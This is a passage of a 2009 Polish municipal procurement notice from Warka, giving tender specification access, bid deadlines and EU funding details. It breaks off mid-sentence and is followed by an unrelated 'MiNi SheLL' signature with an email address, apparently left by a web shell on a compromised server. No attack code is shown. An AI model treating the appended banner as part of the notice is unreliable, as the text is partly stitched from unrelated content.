<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.warka.pl/zp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Warce, pl. St. Czarnieckiego 1, 05-660 Warka, BIURO OBSŁUGI INTERESANTA  w godz. 8°° - 15°° do dnia 14.05.2009r. do godz. 12:00- w wersji papierowej - odpłatność 1000zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 12:00, miejsce: w siedzibie Zamawiającego w BIURZE OBSŁUGI..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający zamierza korzystać ze środków Uni Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego, Priorytet IV, Działanie

Creat By MiNi SheLL
Email: jattceo@gmail.com